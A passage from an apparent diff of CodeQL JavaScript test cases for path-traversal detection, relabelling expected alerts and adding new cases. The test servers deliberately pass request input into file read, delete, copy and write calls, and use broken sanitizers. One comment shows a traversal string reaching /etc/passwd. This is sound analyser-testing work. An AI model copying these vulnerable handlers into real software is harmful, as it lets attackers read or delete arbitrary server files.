url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. - res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; @@ -184,38 +173,45 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); +var srv = http.createServer(function(req, res) { + let path = url.parse(req.url, true).query.path; // $ Source + const improperEscape = escape(path); + res.write(fs.readFileSync(improperEscape)); // $ Alert + const improperEscape2 = unescape(path); + res.write(fs.readFileSync(improperEscape2)); // $ Alert +}); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref index 53d53cb8dc54..ff3d54b0cd56 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref @@ -1 +1,2 @@ -Security/CWE-022/TaintedPath.ql +query: Security/CWE-022/TaintedPath.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..568269866f5f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -5,8 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js index dad320e3abae..13c6ad082abe 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js @@ -5,5 +5,5 @@ let app = express(); app.use(fileUpload()); app.get("/some/path", function (req, res) { - req.files.foo.mv(req.query.bar); + req.files.foo.mv(req.query.bar); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..ffbeb5a767ba 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js @@ -8,11 +8,11 @@ const data = {}; function init() { hb.registerHelper("catFile", function catFile(filePath) { - return fs.readFileSync(filePath); // SINK (reads file) + return fs.readFileSync(filePath); // $ Alert }); hb.registerHelper("prependToLines", function prependToLines(prefix, filePath) { return fs - .readFileSync(filePath) + .readFileSync(filePath) // $ Alert .split("\n") .map((line) => prefix + line) .join("\n"); @@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Source - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Source - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/hapi.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/hapi.js new file mode 100644 index 000000000000..c90da206824e --- /dev/null +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/hapi.js @@ -0,0 +1,22 @@ +const Hapi = require('@hapi/hapi'); +const fs = require('fs').promises; + +(async () => { + const server = Hapi.server({ + port: 3005, + host: 'localhost' + }); + + server.route({ + method: 'GET', + path: '/hello', + handler: async (request, h) => { + const filepath = request.query.filepath; // $ Source + const data = await fs.readFile(filepath, 'utf8'); // $ Alert + const firstLine = data.split('\n')[0]; + return firstLine; + } + }); + + await server.start(); +})(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/more-fs-extra.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/more-fs-extra.js new file mode 100644 index 000000000000..c0715cc9163a --- /dev/null +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/more-fs-extra.js @@ -0,0 +1,33 @@ +const express = require('express'); +const fs = require('fs-extra'); +const app = express(); + +app.use(express.json()); + +app.post('/rmsync', (req, res) => { + const { filename } = req.body; // $ Source + + fs.rmSync(filename); // $ Alert + fs.rm(filename); // $ Alert + fs.rmdir(filename); // $ Alert + fs.rmdirSync(filename); // $ Alert + fs.cp(filename, "destination"); // $ Alert + fs.cp("source", filename); // $ Alert + fs.copyFileSync(filename, "destination"); // $ Alert + fs.copyFileSync("source", filename); // $ Alert + fs.cpSync(filename, "destination"); // $ Alert + fs.cpSync("source", filename); // $ Alert + fs.emptydirSync(filename); // $ Alert + fs.emptydir(filename); // $ Alert + fs.opendir(filename); // $ Alert + fs.opendirSync(filename); // $ Alert + fs.openAsBlob(filename); // $ Alert + fs.statfs(filename); // $ Alert + fs.statfsSync(filename); // $ Alert + fs.open(filename, 'r'); // $ Alert + fs.openSync(filename, 'r'); // $ Alert + fs.outputJSONSync(filename, req.body.data, { spaces: 2 }); // $ Alert + fs.lutimes(filename, new Date(req.body.atime), new Date(req.body.mtime)); // $ Alert + fs.lutimesSync(filename, new Date(req.body.atime), new Date(req.body.mtime)); // $ Alert + fs.outputJsonSync(filename, { timestamp: new Date().toISOString(), action: req.body.action, user: req.body.user}, { spaces: 2 }); // $ Alert +}); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js @@ -8,98 +8,98 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK + res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { @@ -107,71 +107,71 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. @@ -181,191 +181,191 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; - fs.readFileSync(path); // NOT OK + let path = req.query.path; // $ Source + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; @@ -374,58 +374,58 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,22 +6,22 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - 